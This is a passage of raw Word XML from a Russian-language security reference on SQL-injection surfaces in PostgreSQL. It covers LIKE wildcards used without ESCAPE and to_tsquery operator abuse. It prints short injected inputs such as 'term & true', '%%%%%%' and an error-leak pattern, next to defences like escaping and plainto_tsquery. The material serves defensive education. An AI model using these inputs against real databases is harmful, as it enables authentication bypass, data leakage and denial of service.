        <w:t>to_tsquery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>plainto_tsquery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>websearch_to_tsquery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>phraseto_tsquery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) — full-text search с собственным operator-языком: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (AND), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (OR), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (NOT), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;-&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (FOLLOWED BY), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (prefix). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>to_tsquery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — наиболее опасная функция, потому что она </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>парсит operators</w:t>
      </w:r>
      <w:r>
        <w:t>; payload может изменить boolean-логику запроса (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>admin &amp; true</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> всегда true) или вызвать syntax error → error-based extraction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8488EB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Mini-таблица: пять подразделов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7"/>
        <w:gridCol w:w="3110"/>
        <w:gridCol w:w="1387"/>
        <w:gridCol w:w="1434"/>
        <w:gridCol w:w="2022"/>
      </w:tblGrid>
      <w:tr w:rsidR="0019479F" w14:paraId="1004C3F9"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0859562"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FC0ADBC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Точка входа</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DD5FD09" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Семантика</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558FFF0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Канал атаки</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25F6079" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Защита</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="68A461FB"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DEDBE9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.15.1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A732D0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>LIKE :search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55461C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">wildcards </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>%</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>_</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6F4D0D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>bypass auth/access, info leak, DoS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EBE45C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>ESCAPE \</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> + </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>replace('%','\\%')</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="5392F1EC"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4FBBBE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.15.2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E22E88" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>to_tsquery(:search)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1FEE53" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">operators </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>&amp;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> `</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06B49A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>!</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>&lt;-&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>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4B589A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>boolean override, syntax-error info-leak</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="206D61E6"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57CCBE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.15.3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565EFB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>plainto_/websearch_to_tsquery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868160" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>safe alternatives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1E1093" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>(нет атаки — pattern защиты)</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6EA2EF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>migration pattern</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="2104D52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17B70" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.15.4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F94B16" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>`to_tsquery(... \</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C244D6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>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D7A847" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>:input)`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5F59CC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>parser-error канал</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="517324A5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Граница с другими категориями</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4951AD1A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.2 Error-based via CAST</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — 3.15.4 использует тот же error-канал (PostgreSQL parser errors leak input), но source — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>to_tsquery</w:t>
      </w:r>
      <w:r>
        <w:t>-syntax-error, а не CAST-error. Граница: 3.2 описывает CAST-канал; 3.15.4 — tsquery-syntax-канал.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6A8C25" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.3 Boolean-based blind</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — 3.15.1 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LIKE '%' OR ...</w:t>
      </w:r>
      <w:r>
        <w:t>) и 3.15.2 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>to_tsquery('term &amp; true')</w:t>
      </w:r>
      <w:r>
        <w:t>) создают boolean-каналы внутри pattern/tsquery. Граница: 3.3 описывает boolean-канал в общем; 3.15 — конкретные точки входа.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8F4F24" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.9 Обход фильтров</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — pattern в LIKE/tsquery часто используется как обход WAF, который смотрит на буквальные кавычки и keywords, но не понимает pattern-</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>семантику. Граница: 3.9 — общие техники filter bypass; 3.15 — конкретные семантические поверхности.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DC00E8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.14.4 ORDER BY (CASE WHEN)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — boolean-канал тот же тип (sort meet content); 3.15.1 boolean через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LIKE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — параллельный класс точек входа.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1B7C2D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Карта подразделов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B77B785" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.15.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> % и _ в LIKE без ESCAPE — wildcards как auth-bypass + DoS через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'%%%%%%'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC835BE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.15.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to_tsquery operators — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&amp; | ! &lt;-&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> как boolean-override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC29E5A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.15.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> websearch_to_tsquery / plainto_tsquery — безопасные альтернативы + migration pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E41C4DA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.15.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tsquery как error-based канал — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>to_tsquery(... || :input)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → leaked в parser error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C29B715" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Общая модель угроз</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6761A34D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Корень проблемы — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>mismatch между namespace ввода и namespace интерпретации</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C2B8C9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LIKE-pattern namespace</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>языковая аннотация</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> внутри SQL-string. Bind-параметр </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE name LIKE :search</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> передаёт строку без SQL-escaping (нет injection кавычек), но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>значение строки</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> содержит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>_</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — что для движка тождественно «оператор wildcards». Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не bug PostgreSQL</w:t>
      </w:r>
      <w:r>
        <w:t>, это semantics SQL92.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7437BB80" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>tsquery namespace</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>полный operator-язык</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> внутри текстовой строки. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>to_tsquery('admin &amp; superuser')</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> парсит строку как AST: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>admin AND superuser</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Любой ввод от пользователя в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>to_tsquery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>запуск парсера полного языка</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>eval()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в Python.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19211E74" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Принципиальная разница с обычной SQL-инъекцией: даже </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>правильная bind-параметризация не защищает</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — bind подставляет значение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>в строку</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, но movement-семантика внутри строки уже находится </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>под контролем атакующего</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Защита требует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>либо escape pattern-символов на стороне приложения</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, либо </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>переход на функцию, которая не парсит operators</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>plainto_tsquery</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> вместо </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>to_tsquery</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269A12D9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>класс паттернов</w:t>
      </w:r>
      <w:r>
        <w:t>, не CVE — все подразделы 3.15 описывают standard SQL/PG features, используемые неправильно.</w:t>
      </w:r>
    </w:p>
